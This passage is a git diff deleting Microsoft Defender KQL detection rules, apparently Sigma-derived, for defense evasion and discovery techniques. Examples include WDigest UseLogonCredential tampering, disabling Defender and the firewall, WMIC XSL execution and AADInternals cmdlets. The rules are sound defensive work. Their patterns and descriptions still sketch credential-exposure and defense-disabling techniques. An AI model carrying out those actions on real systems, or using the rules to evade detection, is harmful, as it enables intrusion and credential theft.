-// Author: Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems)
-// Date: 2023/04/11
-// Level: medium
-// Description: Detects renamed execution of "Microsoft.NodejsTools.PressAnyKey.exe", which can be abused as a LOLBIN to execute arbitrary binaries
-// Tags: attack.execution, attack.defense_evasion, attack.t1218
-DeviceProcessEvents
-| where ProcessVersionInfoOriginalFileName =~ "Microsoft.NodejsTools.PressAnyKey.exe" and (not(FolderPath endswith "\\Microsoft.NodejsTools.PressAnyKey.exe"))
\ No newline at end of file
diff --git a/Defense Evasion/WMIC_Loading_Scripting_Libraries.kql b/Defense Evasion/WMIC_Loading_Scripting_Libraries.kql
deleted file mode 100644
index 0a3175de..00000000
--- a/Defense Evasion/WMIC_Loading_Scripting_Libraries.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
-// Date: 2020/10/17
-// Level: medium
-// Description: Detects threat actors proxy executing code and bypassing application controls by leveraging wmic and the `/FORMAT` argument switch to download and execute an XSL file (i.e js, vbs, etc).
-// Tags: attack.defense_evasion, attack.t1220
-DeviceImageLoadEvents
-| where (FolderPath endswith "\\jscript.dll" or FolderPath endswith "\\vbscript.dll") and InitiatingProcessFolderPath endswith "\\wmic.exe"
\ No newline at end of file
diff --git a/Defense Evasion/WSL_Child_Process_Anomaly.kql b/Defense Evasion/WSL_Child_Process_Anomaly.kql
deleted file mode 100644
index 83b49b76..00000000
--- a/Defense Evasion/WSL_Child_Process_Anomaly.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/01/23
-// Level: medium
-// Description: Detects uncommon or suspicious child processes spawning from a WSL process. This could indicate an attempt to evade parent/child relationship detections or persistence attempts via cron using WSL
-// Tags: attack.execution, attack.defense_evasion, attack.t1218, attack.t1202
-DeviceProcessEvents
-| where (InitiatingProcessFolderPath endswith "\\wsl.exe" or InitiatingProcessFolderPath endswith "\\wslhost.exe") and ((FolderPath endswith "\\calc.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\wscript.exe") or (FolderPath contains "\\AppData\\Local\\Temp\\" or FolderPath contains "C:\\Users\\Public\\" or FolderPath contains "C:\\Windows\\Temp\\" or FolderPath contains "C:\\Temp\\" or FolderPath contains "\\Downloads\\" or FolderPath contains "\\Desktop\\"))
\ No newline at end of file
diff --git a/Defense Evasion/Wab_Execution_From_Non_Default_Location.kql b/Defense Evasion/Wab_Execution_From_Non_Default_Location.kql
deleted file mode 100644
index 0ce9c87e..00000000
--- a/Defense Evasion/Wab_Execution_From_Non_Default_Location.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/08/12
-// Level: high
-// Description: Detects execution of wab.exe (Windows Contacts) and Wabmig.exe (Microsoft Address Book Import Tool) from non default locations as seen with bumblebee activity
-// Tags: attack.defense_evasion, attack.execution
-DeviceProcessEvents
-| where (FolderPath endswith "\\wab.exe" or FolderPath endswith "\\wabmig.exe") and (not((FolderPath startswith "C:\\Windows\\WinSxS\\" or FolderPath startswith "C:\\Program Files\\Windows Mail\\" or FolderPath startswith "C:\\Program Files (x86)\\Windows Mail\\")))
\ No newline at end of file
diff --git a/Defense Evasion/Wdigest_CredGuard_Registry_Modification.kql b/Defense Evasion/Wdigest_CredGuard_Registry_Modification.kql
deleted file mode 100644
index 4339d55a..00000000
--- a/Defense Evasion/Wdigest_CredGuard_Registry_Modification.kql
+++ /dev/null
@@ -1,10 +0,0 @@
-// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
-// Date: 2019/08/25
-// Level: high
-// Description: Detects potential malicious modification of the property value of IsCredGuardEnabled from
-HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest to disable Cred Guard on a system.
-This is usually used with UseLogonCredential to manipulate the caching credentials.
-
-// Tags: attack.defense_evasion, attack.t1112
-DeviceRegistryEvents
-| where RegistryKey endswith "\\IsCredGuardEnabled"
\ No newline at end of file
diff --git a/Defense Evasion/Wdigest_Enable_UseLogonCredential.kql b/Defense Evasion/Wdigest_Enable_UseLogonCredential.kql
deleted file mode 100644
index a594a1fb..00000000
--- a/Defense Evasion/Wdigest_Enable_UseLogonCredential.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
-// Date: 2019/09/12
-// Level: high
-// Description: Detects potential malicious modification of the property value of UseLogonCredential from HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest to enable clear-text credentials
-// Tags: attack.defense_evasion, attack.t1112
-DeviceRegistryEvents
-| where RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey endswith "WDigest\\UseLogonCredential"
\ No newline at end of file
diff --git a/Defense Evasion/Weak_or_Abused_Passwords_In_CLI.kql b/Defense Evasion/Weak_or_Abused_Passwords_In_CLI.kql
deleted file mode 100644
index 495f7484..00000000
--- a/Defense Evasion/Weak_or_Abused_Passwords_In_CLI.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/09/14
-// Level: medium
-// Description: Detects weak passwords or often abused passwords (seen used by threat actors) via the CLI.
-An example would be a threat actor creating a new user via the net command and providing the password inline
-
-// Tags: attack.defense_evasion, attack.execution
-DeviceProcessEvents
-| where ProcessCommandLine contains "123456789" or ProcessCommandLine contains "123123qwE" or ProcessCommandLine contains "Asd123.aaaa" or ProcessCommandLine contains "Decryptme" or ProcessCommandLine contains "P@ssw0rd!" or ProcessCommandLine contains "Pass8080" or ProcessCommandLine contains "password123" or ProcessCommandLine contains "test@202"
\ No newline at end of file
diff --git a/Defense Evasion/Windows_Binaries_Write_Suspicious_Extensions.kql b/Defense Evasion/Windows_Binaries_Write_Suspicious_Extensions.kql
deleted file mode 100644
index fa5bb1a0..00000000
--- a/Defense Evasion/Windows_Binaries_Write_Suspicious_Extensions.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/08/12
-// Level: high
-// Description: Detects Windows executables that write files with suspicious extensions
-// Tags: attack.defense_evasion, attack.t1036
-DeviceFileEvents
-| where (((InitiatingProcessFolderPath endswith "\\csrss.exe" or InitiatingProcessFolderPath endswith "\\lsass.exe" or InitiatingProcessFolderPath endswith "\\RuntimeBroker.exe" or InitiatingProcessFolderPath endswith "\\sihost.exe" or InitiatingProcessFolderPath endswith "\\smss.exe" or InitiatingProcessFolderPath endswith "\\wininit.exe" or InitiatingProcessFolderPath endswith "\\winlogon.exe") and (FolderPath endswith ".bat" or FolderPath endswith ".dll" or FolderPath endswith ".exe" or FolderPath endswith ".hta" or FolderPath endswith ".iso" or FolderPath endswith ".ps1" or FolderPath endswith ".txt" or FolderPath endswith ".vbe" or FolderPath endswith ".vbs")) or ((InitiatingProcessFolderPath endswith "\\dllhost.exe" or InitiatingProcessFolderPath endswith "\\rundll32.exe" or InitiatingProcessFolderPath endswith "\\svchost.exe") and (FolderPath endswith ".bat" or FolderPath endswith ".hta" or FolderPath endswith ".iso" or FolderPath endswith ".ps1" or FolderPath endswith ".vbe" or FolderPath endswith ".vbs"))) and (not(((InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\dllhost.exe" and (FolderPath contains ":\\Users\\" and FolderPath contains "\\AppData\\Local\\Temp\\__PSScriptPolicyTest_") and FolderPath endswith ".ps1") or (InitiatingProcessFolderPath =~ "C:\\Windows\\system32\\svchost.exe" and (FolderPath contains "C:\\Windows\\System32\\GroupPolicy\\DataStore\\" and FolderPath contains "\\sysvol\\" and FolderPath contains "\\Policies\\" and FolderPath contains "\\Machine\\Scripts\\Startup\\") and (FolderPath endswith ".ps1" or FolderPath endswith ".bat")))))
\ No newline at end of file
diff --git a/Defense Evasion/Windows_Defender_Definition_Files_Removed.kql b/Defense Evasion/Windows_Defender_Definition_Files_Removed.kql
deleted file mode 100644
index 0aebc2e2..00000000
--- a/Defense Evasion/Windows_Defender_Definition_Files_Removed.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2021/07/07
-// Level: high
-// Description: Adversaries may disable security tools to avoid possible detection of their tools and activities by removing Windows Defender Definition Files
-// Tags: attack.defense_evasion, attack.t1562.001
-DeviceProcessEvents
-| where (ProcessCommandLine contains " -RemoveDefinitions" and ProcessCommandLine contains " -All") and (FolderPath endswith "\\MpCmdRun.exe" or ProcessVersionInfoOriginalFileName =~ "MpCmdRun.exe")
\ No newline at end of file
diff --git a/Defense Evasion/Windows_Defender_Exclusions_Added_-_Registry.kql b/Defense Evasion/Windows_Defender_Exclusions_Added_-_Registry.kql
deleted file mode 100644
index 00caa0ec..00000000
--- a/Defense Evasion/Windows_Defender_Exclusions_Added_-_Registry.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Christian Burkard (Nextron Systems)
-// Date: 2021/07/06
-// Level: medium
-// Description: Detects the Setting of Windows Defender Exclusions
-// Tags: attack.defense_evasion, attack.t1562.001
-DeviceRegistryEvents
-| where RegistryKey contains "\\Microsoft\\Windows Defender\\Exclusions"
\ No newline at end of file
diff --git a/Defense Evasion/Windows_Defender_Service_Disabled_-_Registry.kql b/Defense Evasion/Windows_Defender_Service_Disabled_-_Registry.kql
deleted file mode 100644
index 4734ecfb..00000000
--- a/Defense Evasion/Windows_Defender_Service_Disabled_-_Registry.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Ján Trenčanský, frack113, AlertIQ, Nasreddine Bencherchali
-// Date: 2022/08/01
-// Level: high
-// Description: Detects when an attacker or tool disables the Windows Defender service (WinDefend) via the registry
-// Tags: attack.defense_evasion, attack.t1562.001
-DeviceRegistryEvents
-| where RegistryValueData =~ "DWORD (0x00000004)" and RegistryKey endswith "\\Services\\WinDefend\\Start"
\ No newline at end of file
diff --git a/Defense Evasion/Windows_Firewall_Disabled_via_PowerShell.kql b/Defense Evasion/Windows_Firewall_Disabled_via_PowerShell.kql
deleted file mode 100644
index 0cc30a00..00000000
--- a/Defense Evasion/Windows_Firewall_Disabled_via_PowerShell.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Tim Rauch, Elastic (idea)
-// Date: 2022/09/14
-// Level: medium
-// Description: Detects attempts to disable the Windows Firewall using PowerShell
-// Tags: attack.defense_evasion, attack.t1562
-DeviceProcessEvents
-| where (ProcessCommandLine contains "Set-NetFirewallProfile " and ProcessCommandLine contains " -Enabled " and ProcessCommandLine contains " False") and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\powershell_ise.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll"))) and (ProcessCommandLine contains " -All " or ProcessCommandLine contains "Public" or ProcessCommandLine contains "Domain" or ProcessCommandLine contains "Private")
\ No newline at end of file
diff --git a/Defense Evasion/Windows_Kernel_Debugger_Execution.kql b/Defense Evasion/Windows_Kernel_Debugger_Execution.kql
deleted file mode 100644
index 1742c500..00000000
--- a/Defense Evasion/Windows_Kernel_Debugger_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/05/15
-// Level: medium
-// Description: Detects execution of the Windows Kernel Debugger "kd.exe".
-// Tags: attack.defense_evasion, attack.privilege_escalation
-DeviceProcessEvents
-| where FolderPath endswith "\\kd.exe" or ProcessVersionInfoOriginalFileName =~ "kd.exe"
\ No newline at end of file
diff --git a/Defense Evasion/Windows_Processes_Suspicious_Parent_Directory.kql b/Defense Evasion/Windows_Processes_Suspicious_Parent_Directory.kql
deleted file mode 100644
index 7905e6de..00000000
--- a/Defense Evasion/Windows_Processes_Suspicious_Parent_Directory.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: vburov
-// Date: 2019/02/23
-// Level: low
-// Description: Detect suspicious parent processes of well-known Windows processes
-// Tags: attack.defense_evasion, attack.t1036.003, attack.t1036.005
-DeviceProcessEvents
-| where (FolderPath endswith "\\svchost.exe" or FolderPath endswith "\\taskhost.exe" or FolderPath endswith "\\lsm.exe" or FolderPath endswith "\\lsass.exe" or FolderPath endswith "\\services.exe" or FolderPath endswith "\\lsaiso.exe" or FolderPath endswith "\\csrss.exe" or FolderPath endswith "\\wininit.exe" or FolderPath endswith "\\winlogon.exe") and (not((((InitiatingProcessFolderPath contains "\\Windows Defender\\" or InitiatingProcessFolderPath contains "\\Microsoft Security Client\\") and InitiatingProcessFolderPath endswith "\\MsMpEng.exe") or (isnull(InitiatingProcessFolderPath) or InitiatingProcessFolderPath =~ "-") or ((InitiatingProcessFolderPath endswith "\\SavService.exe" or InitiatingProcessFolderPath endswith "\\ngen.exe") or (InitiatingProcessFolderPath contains "\\System32\\" or InitiatingProcessFolderPath contains "\\SysWOW64\\")))))
\ No newline at end of file
diff --git a/Defense Evasion/Windows_Spooler_Service_Suspicious_Binary_Load.kql b/Defense Evasion/Windows_Spooler_Service_Suspicious_Binary_Load.kql
deleted file mode 100644
index e0568272..00000000
--- a/Defense Evasion/Windows_Spooler_Service_Suspicious_Binary_Load.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: FPT.EagleEye, Thomas Patzke (improvements)
-// Date: 2021/06/29
-// Level: informational
-// Description: Detect DLL Load from Spooler Service backup folder
-// Tags: attack.persistence, attack.defense_evasion, attack.privilege_escalation, attack.t1574, cve.2021.1675, cve.2021.34527
-DeviceImageLoadEvents
-| where (FolderPath contains "\\Windows\\System32\\spool\\drivers\\x64\\3\\" or FolderPath contains "\\Windows\\System32\\spool\\drivers\\x64\\4\\") and FolderPath endswith ".dll" and InitiatingProcessFolderPath endswith "\\spoolsv.exe"
\ No newline at end of file
diff --git a/Defense Evasion/Winget_Admin_Settings_Modification.kql b/Defense Evasion/Winget_Admin_Settings_Modification.kql
deleted file mode 100644
index 4043350a..00000000
--- a/Defense Evasion/Winget_Admin_Settings_Modification.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/04/17
-// Level: low
-// Description: Detects changes to the AppInstaller (winget) admin settings. Such as enabling local manifest installations or disabling installer hash checks
-// Tags: attack.defense_evasion, attack.persistence
-DeviceRegistryEvents
-| where InitiatingProcessFolderPath endswith "\\winget.exe" and RegistryKey endswith "\\LocalState\\admin_settings" and RegistryKey startswith "\\REGISTRY\\A"
\ No newline at end of file
diff --git a/Defense Evasion/Winlogon_AllowMultipleTSSessions_Enable.kql b/Defense Evasion/Winlogon_AllowMultipleTSSessions_Enable.kql
deleted file mode 100644
index 9143ea08..00000000
--- a/Defense Evasion/Winlogon_AllowMultipleTSSessions_Enable.kql
+++ /dev/null
@@ -1,10 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/09/09
-// Level: medium
-// Description: Detects when the 'AllowMultipleTSSessions' value is enabled.
-Which allows for multiple Remote Desktop connection sessions to be opened at once.
-This is often used by attacker as a way to connect to an RDP session without disconnecting the other users
-
-// Tags: attack.persistence, attack.defense_evasion, attack.t1112
-DeviceRegistryEvents
-| where RegistryValueData endswith "DWORD (0x00000001)" and RegistryKey endswith "\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\AllowMultipleTSSessions"
\ No newline at end of file
diff --git a/Defense Evasion/Wlrmdr.EXE_Uncommon_Argument_Or_Child_Process.kql b/Defense Evasion/Wlrmdr.EXE_Uncommon_Argument_Or_Child_Process.kql
deleted file mode 100644
index 5675cce0..00000000
--- a/Defense Evasion/Wlrmdr.EXE_Uncommon_Argument_Or_Child_Process.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: frack113, manasmbellani
-// Date: 2022/02/16
-// Level: medium
-// Description: Detects the execution of "Wlrmdr.exe" with the "-u" command line flag which allows anything passed to it to be an argument of the ShellExecute API, which would allow an attacker to execute arbitrary binaries.
-This detection also focuses on any uncommon child processes spawned from "Wlrmdr.exe" as a supplement for those that posses "ParentImage" telemetry.
-
-// Tags: attack.defense_evasion, attack.t1218
-DeviceProcessEvents
-| where InitiatingProcessFolderPath endswith "\\wlrmdr.exe" or ((((ProcessCommandLine contains "-s " or ProcessCommandLine contains "/s ") and (ProcessCommandLine contains "-f " or ProcessCommandLine contains "/f ") and (ProcessCommandLine contains "-t " or ProcessCommandLine contains "/t ") and (ProcessCommandLine contains "-m " or ProcessCommandLine contains "/m ") and (ProcessCommandLine contains "-a " or ProcessCommandLine contains "/a ") and (ProcessCommandLine contains "-u " or ProcessCommandLine contains "/u ")) and (FolderPath endswith "\\wlrmdr.exe" or ProcessVersionInfoOriginalFileName =~ "WLRMNDR.EXE")) and (not(((InitiatingProcessFolderPath in~ ("", "-")) or isnull(InitiatingProcessFolderPath) or InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\winlogon.exe"))))
\ No newline at end of file
diff --git a/Defense Evasion/Write_Protect_For_Storage_Disabled.kql b/Defense Evasion/Write_Protect_For_Storage_Disabled.kql
deleted file mode 100644
index d0e57787..00000000
--- a/Defense Evasion/Write_Protect_For_Storage_Disabled.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Sreeman
-// Date: 2021/06/11
-// Level: medium
-// Description: Detects applications trying to modify the registry in order to disable any write-protect property for storage devices.
-This could be a precursor to a ransomware attack and has been an observed technique used by cypherpunk group.
-
-// Tags: attack.defense_evasion, attack.t1562
-DeviceProcessEvents
-| where ProcessCommandLine contains "\\System\\CurrentControlSet\\Control" and ProcessCommandLine contains "Write Protection" and ProcessCommandLine contains "0" and ProcessCommandLine contains "storage"
\ No newline at end of file
diff --git a/Defense Evasion/Writing_Of_Malicious_Files_To_The_Fonts_Folder.kql b/Defense Evasion/Writing_Of_Malicious_Files_To_The_Fonts_Folder.kql
deleted file mode 100644
index ec001999..00000000
--- a/Defense Evasion/Writing_Of_Malicious_Files_To_The_Fonts_Folder.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Sreeman
-// Date: 2020/04/21
-// Level: medium
-// Description: Monitors for the hiding possible malicious files in the C:\Windows\Fonts\ location. This folder doesn't require admin privillege to be written and executed from.
-// Tags: attack.t1211, attack.t1059, attack.defense_evasion, attack.persistence
-DeviceProcessEvents
-| where (ProcessCommandLine contains "echo" or ProcessCommandLine contains "copy" or ProcessCommandLine contains "type" or ProcessCommandLine contains "file createnew" or ProcessCommandLine contains "cacls") and ProcessCommandLine contains "C:\\Windows\\Fonts\\" and (ProcessCommandLine contains ".sh" or ProcessCommandLine contains ".exe" or ProcessCommandLine contains ".dll" or ProcessCommandLine contains ".bin" or ProcessCommandLine contains ".bat" or ProcessCommandLine contains ".cmd" or ProcessCommandLine contains ".js" or ProcessCommandLine contains ".msh" or ProcessCommandLine contains ".reg" or ProcessCommandLine contains ".scr" or ProcessCommandLine contains ".ps" or ProcessCommandLine contains ".vb" or ProcessCommandLine contains ".jar" or ProcessCommandLine contains ".pl" or ProcessCommandLine contains ".inf" or ProcessCommandLine contains ".cpl" or ProcessCommandLine contains ".hta" or ProcessCommandLine contains ".msi" or ProcessCommandLine contains ".vbs")
\ No newline at end of file
diff --git a/Defense Evasion/XBAP_Execution_From_Uncommon_Locations_Via_PresentationHost.EXE.kql b/Defense Evasion/XBAP_Execution_From_Uncommon_Locations_Via_PresentationHost.EXE.kql
deleted file mode 100644
index bd2befa9..00000000
--- a/Defense Evasion/XBAP_Execution_From_Uncommon_Locations_Via_PresentationHost.EXE.kql
+++ /dev/null
@@ -1,8 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/07/01
-// Level: medium
-// Description: Detects the execution of ".xbap" (Browser Applications) files via PresentationHost.EXE from an uncommon location. These files can be abused to run malicious ".xbap" files any bypass AWL
-
-// Tags: attack.defense_evasion, attack.execution, attack.t1218
-DeviceProcessEvents
-| where (ProcessCommandLine contains ".xbap" and (FolderPath endswith "\\presentationhost.exe" or ProcessVersionInfoOriginalFileName =~ "PresentationHost.exe")) and (not((ProcessCommandLine contains " C:\\Windows\\" or ProcessCommandLine contains " C:\\Program Files")))
\ No newline at end of file
diff --git a/Defense Evasion/XSL_Script_Execution_Via_WMIC.EXE.kql b/Defense Evasion/XSL_Script_Execution_Via_WMIC.EXE.kql
deleted file mode 100644
index 206710d7..00000000
--- a/Defense Evasion/XSL_Script_Execution_Via_WMIC.EXE.kql
+++ /dev/null
@@ -1,10 +0,0 @@
-// Author: Timur Zinniatullin, oscd.community, Swachchhanda Shrawan Poudel
-// Date: 2019/10/21
-// Level: medium
-// Description: Detects the execution of WMIC with the "format" flag to potentially load XSL files.
-Adversaries abuse this functionality to execute arbitrary files while potentially bypassing application whitelisting defenses.
-Extensible Stylesheet Language (XSL) files are commonly used to describe the processing and rendering of data within XML files.
-
-// Tags: attack.defense_evasion, attack.t1220
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "-format" or ProcessCommandLine contains "/format") and FolderPath endswith "\\wmic.exe") and (not((ProcessCommandLine contains "Format:List" or ProcessCommandLine contains "Format:htable" or ProcessCommandLine contains "Format:hform" or ProcessCommandLine contains "Format:table" or ProcessCommandLine contains "Format:mof" or ProcessCommandLine contains "Format:value" or ProcessCommandLine contains "Format:rawxml" or ProcessCommandLine contains "Format:xml" or ProcessCommandLine contains "Format:csv")))
\ No newline at end of file
diff --git a/Defense Evasion/Xwizard.EXE_Execution_From_Non-Default_Location.kql b/Defense Evasion/Xwizard.EXE_Execution_From_Non-Default_Location.kql
deleted file mode 100644
index b29fa211..00000000
--- a/Defense Evasion/Xwizard.EXE_Execution_From_Non-Default_Location.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Christian Burkard (Nextron Systems)
-// Date: 2021/09/20
-// Level: high
-// Description: Detects the execution of Xwizard tool from a non-default directory.
-When executed from a non-default directory, this utility can be abused in order to side load a custom version of "xwizards.dll".
-
-// Tags: attack.defense_evasion, attack.t1574.002
-DeviceProcessEvents
-| where (FolderPath endswith "\\xwizard.exe" or ProcessVersionInfoOriginalFileName =~ "xwizard.exe") and (not((FolderPath startswith "C:\\Windows\\System32\\" or FolderPath startswith "C:\\Windows\\SysWOW64\\")))
\ No newline at end of file
diff --git a/Discovery/AADInternals_PowerShell_Cmdlets_Execution_-_ProccessCreation.kql b/Discovery/AADInternals_PowerShell_Cmdlets_Execution_-_ProccessCreation.kql
deleted file mode 100644
index 5a91ee73..00000000
--- a/Discovery/AADInternals_PowerShell_Cmdlets_Execution_-_ProccessCreation.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Austin Songer (@austinsonger), Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/12/23
-// Level: high
-// Description: Detects ADDInternals Cmdlet execution. A tool for administering Azure AD and Office 365. Which can be abused by threat actors to attack Azure AD or Office 365.
-// Tags: attack.execution, attack.reconnaissance, attack.discovery, attack.credential_access, attack.impact
-DeviceProcessEvents
-| where (ProcessCommandLine contains "Add-AADInt" or ProcessCommandLine contains "ConvertTo-AADInt" or ProcessCommandLine contains "Disable-AADInt" or ProcessCommandLine contains "Enable-AADInt" or ProcessCommandLine contains "Export-AADInt" or ProcessCommandLine contains "Get-AADInt" or ProcessCommandLine contains "Grant-AADInt" or ProcessCommandLine contains "Install-AADInt" or ProcessCommandLine contains "Invoke-AADInt" or ProcessCommandLine contains "Join-AADInt" or ProcessCommandLine contains "New-AADInt" or ProcessCommandLine contains "Open-AADInt" or ProcessCommandLine contains "Read-AADInt" or ProcessCommandLine contains "Register-AADInt" or ProcessCommandLine contains "Remove-AADInt" or ProcessCommandLine contains "Restore-AADInt" or ProcessCommandLine contains "Search-AADInt" or ProcessCommandLine contains "Send-AADInt" or ProcessCommandLine contains "Set-AADInt" or ProcessCommandLine contains "Start-AADInt" or ProcessCommandLine contains "Update-AADInt") and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.Exe", "pwsh.dll")))
\ No newline at end of file
diff --git a/Discovery/Active_Directory_Structure_Export_Via_Csvde.EXE.kql b/Discovery/Active_Directory_Structure_Export_Via_Csvde.EXE.kql
deleted file mode 100644
index f4819e7d..00000000
--- a/Discovery/Active_Directory_Structure_Export_Via_Csvde.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/03/14
-// Level: medium
-// Description: Detects the execution of "csvde.exe" in order to export organizational Active Directory structure.
-// Tags: attack.exfiltration, attack.discovery, attack.t1087.002
-DeviceProcessEvents
-| where ((FolderPath endswith "\\csvde.exe" or ProcessVersionInfoOriginalFileName =~ "csvde.exe") and ProcessCommandLine contains " -f") and (not(ProcessCommandLine contains " -i"))
\ No newline at end of file
diff --git a/Discovery/Advanced_IP_Scanner_-_File_Event.kql b/Discovery/Advanced_IP_Scanner_-_File_Event.kql
deleted file mode 100644
index f1a91211..00000000
--- a/Discovery/Advanced_IP_Scanner_-_File_Event.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: @ROxPinTeddy
-// Date: 2020/05/12
-// Level: medium
-// Description: Detects the use of Advanced IP Scanner. Seems to be a popular tool for ransomware groups.
-// Tags: attack.discovery, attack.t1046
-DeviceFileEvents
-| where FolderPath contains "\\AppData\\Local\\Temp\\Advanced IP Scanner 2"
\ No newline at end of file
diff --git a/Discovery/BloodHound_Collection_Files.kql b/Discovery/BloodHound_Collection_Files.kql
deleted file mode 100644
index 2dd9a6ed..00000000
--- a/Discovery/BloodHound_Collection_Files.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: C.J. May
-// Date: 2022/08/09
-// Level: high
-// Description: Detects default file names outputted by the BloodHound collection tool SharpHound
-// Tags: attack.discovery, attack.t1087.001, attack.t1087.002, attack.t1482, attack.t1069.001, attack.t1069.002, attack.execution, attack.t1059.001
-DeviceFileEvents
-| where (FolderPath endswith "BloodHound.zip" or FolderPath endswith "_computers.json" or FolderPath endswith "_containers.json" or FolderPath endswith "_domains.json" or FolderPath endswith "_gpos.json" or FolderPath endswith "_groups.json" or FolderPath endswith "_ous.json" or FolderPath endswith "_users.json") and (not((InitiatingProcessFolderPath endswith "\\svchost.exe" and FolderPath endswith "\\pocket_containers.json" and FolderPath startswith "C:\\Program Files\\WindowsApps\\Microsoft.")))
\ No newline at end of file
diff --git a/Discovery/Computer_Discovery_And_Export_Via_Get-ADComputer_Cmdlet.kql b/Discovery/Computer_Discovery_And_Export_Via_Get-ADComputer_Cmdlet.kql
deleted file mode 100644
index d04369ff..00000000
--- a/Discovery/Computer_Discovery_And_Export_Via_Get-ADComputer_Cmdlet.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/11/10
-// Level: medium
-// Description: Detects usage of the Get-ADComputer cmdlet to collect computer information and output it to a file
-// Tags: attack.discovery, attack.t1033
-DeviceProcessEvents
-| where ((ProcessCommandLine contains " > " or ProcessCommandLine contains " | Select " or ProcessCommandLine contains "Out-File" or ProcessCommandLine contains "Set-Content" or ProcessCommandLine contains "Add-Content") and (ProcessCommandLine contains "Get-ADComputer " and ProcessCommandLine contains " -Filter *")) and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll")))
\ No newline at end of file
diff --git a/Discovery/Computer_System_Reconnaissance_Via_Wmic.EXE.kql b/Discovery/Computer_System_Reconnaissance_Via_Wmic.EXE.kql
deleted file mode 100644
index 3aa4acf8..00000000
--- a/Discovery/Computer_System_Reconnaissance_Via_Wmic.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/09/08
-// Level: medium
-// Description: Detects execution of wmic utility with the "computersystem" flag in order to obtain information about the machine such as the domain, username, model, etc.
-// Tags: attack.discovery, attack.execution, attack.t1047
-DeviceProcessEvents
-| where ProcessCommandLine contains "computersystem" and (FolderPath endswith "\\wmic.exe" or ProcessVersionInfoOriginalFileName =~ "wmic.exe")
\ No newline at end of file
diff --git a/Discovery/Console_CodePage_Lookup_Via_CHCP.kql b/Discovery/Console_CodePage_Lookup_Via_CHCP.kql
deleted file mode 100644
index 7179f355..00000000
--- a/Discovery/Console_CodePage_Lookup_Via_CHCP.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: _pete_0, TheDFIRReport
-// Date: 2022/02/21
-// Level: medium
-// Description: Detects use of chcp to look up the system locale value as part of host discovery
-// Tags: attack.discovery, attack.t1614.001
-DeviceProcessEvents
-| where (ProcessCommandLine endswith "chcp" or ProcessCommandLine endswith "chcp " or ProcessCommandLine endswith "chcp ") and FolderPath endswith "\\chcp.com" and (InitiatingProcessCommandLine contains " -c " or InitiatingProcessCommandLine contains " /c " or InitiatingProcessCommandLine contains " -r " or InitiatingProcessCommandLine contains " /r " or InitiatingProcessCommandLine contains " -k " or InitiatingProcessCommandLine contains " /k ") and InitiatingProcessFolderPath endswith "\\cmd.exe"
\ No newline at end of file
diff --git a/Discovery/Detected_Windows_Software_Discovery.kql b/Discovery/Detected_Windows_Software_Discovery.kql
deleted file mode 100644
index 76f1939d..00000000
--- a/Discovery/Detected_Windows_Software_Discovery.kql
+++ /dev/null
